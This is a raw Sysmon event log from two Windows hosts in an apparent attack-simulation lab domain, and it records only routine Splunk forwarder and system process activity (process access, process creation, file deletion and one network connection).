07:42:52.221{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F27C-60EB-E07C-00000000CF01}4188C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27C-60EB-E07C-00000000CF01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.206{466BC892-F27C-60EB-E07C-00000000CF01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.189{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CD98C9B50EA4F93479F24949074D451,SHA256=58324A938ECED25000DC215294DCA4C57BA335A0B0C6A885057DEE00FB12EC40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:52.095{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71D04907AD989109179FB8FF57802D27,SHA256=C9C3F0E44D53323F8AEAAFF6719CA156C930194637A8CCF65AF6E41C19255546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:53.126{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCE8AD42BCC212E24D6D3436D3C2CC7,SHA256=6EA087A5962A6295FC47A15CE15617F6E0D61A6F57948700FEDFAAA1A503E668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.906{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBF17196F7B9DF04D411031FA2BF4EBF,SHA256=C0BF0B2A3C9E70D4B798A8DC07F7177F02E4216CC73FACDB3A884348B105334F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.838{466BC892-F27D-60EB-E27C-00000000CF01}98729860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27D-60EB-E27C-00000000CF01}9872C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:53.591{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:53.591{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F27D-60EB-E27C-00000000CF01}9872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27D-60EB-E27C-00000000CF01}9872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.586{466BC892-F27D-60EB-E27C-00000000CF01}9872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001045653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:44.726{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50884-false10.0.1.12-8000- 23542300x80000000000000001045652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F784B568FF47AE562B5E0C97D520ECB,SHA256=63C4903789D226D31FEAF6391D369533C77BEC7546EDDC84952847A06F7246D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.105{466BC892-F27C-60EB-E17C-00000000CF01}6404396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.287{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27E-60EB-E37C-00000000CF01}10008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:54.285{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.285{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:54.285{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.285{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:42:54.284{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F27E-60EB-E37C-00000000CF01}10008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.268{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27E-60EB-E37C-00000000CF01}10008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.269{466BC892-F27E-60EB-E37C-00000000CF01}10008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.237{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E96F3FA732FEC72B9A8490D99133E5CB,SHA256=C9EC1528FAC69EC3E6FE92A240E09B49B42F4A5EB676330082007B0F7E54F274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:54.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F7AB012041B9CDD4363992534F46FA1,SHA256=0A3C235078E177A5C75FAB1866DBB9D102E0D5A8B0CABFCD35AFA04F92215541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:55.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53BEE2455228E7E76FABC0E1A3E2AFB7,SHA256=C26A2F648414FCADA018328EB05251FCCEEBCA75B7571011BB11DE0A64158F57,IMPHASH=00000000000000000000000000000000falsetrue 
